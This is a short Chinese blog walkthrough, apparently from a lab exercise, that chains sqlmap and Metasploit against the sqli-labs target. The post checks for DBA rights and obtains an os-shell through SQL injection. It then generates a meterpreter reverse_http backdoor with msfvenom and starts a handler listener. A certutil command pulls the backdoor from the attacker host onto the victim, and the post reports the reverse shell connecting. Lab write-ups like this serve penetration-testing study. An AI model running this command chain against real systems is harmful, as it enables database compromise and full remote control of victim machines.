sqlmap联动msf

靶机 sqli-labs靶场 ip:192.168.206.131

攻击机 kali ip:192.168.206.128

sqlmap -u "http://192.168.206.131/sqli-labs/Less-1/?id=1"

image-20240805014335749

sqlmap -u "" --is-dba

判断是否是最高权限用户 发现是 可以进行 高权限操作 -os-shell

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.206.128 lport=9999 -f exe -o sql.exe#生成msf后门
  开启监听:
        msf6> use exploit/multi/handler
        msf6> set lhost 192.168.206.128
        msf6> set lport 9999
        msf6> run

image-20240805023856998

我这将sql.exe 放在192.168.206.131 的目录下当做 我的远程服务器

 python sqlmap.py -u "URL" --os-shell=certutil -urlcache -split -f http://攻击者服务器地址/后门文件 下载到目标机地址下d:/sql.exe     #交互式命令执行下载后门 将sql.exe下载到受害机上
sqlmap -u "http://192.168.206.131/sqli-labs/Less-1/?id=1" --os-shell#先获取os-shell


image-20240805023454555

执行命令

image-20240805023730253

反弹成功

image-20240805023830188

反弹成功

[外链图片转存中…(img-GZbl86Uf-1722797040939)]

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值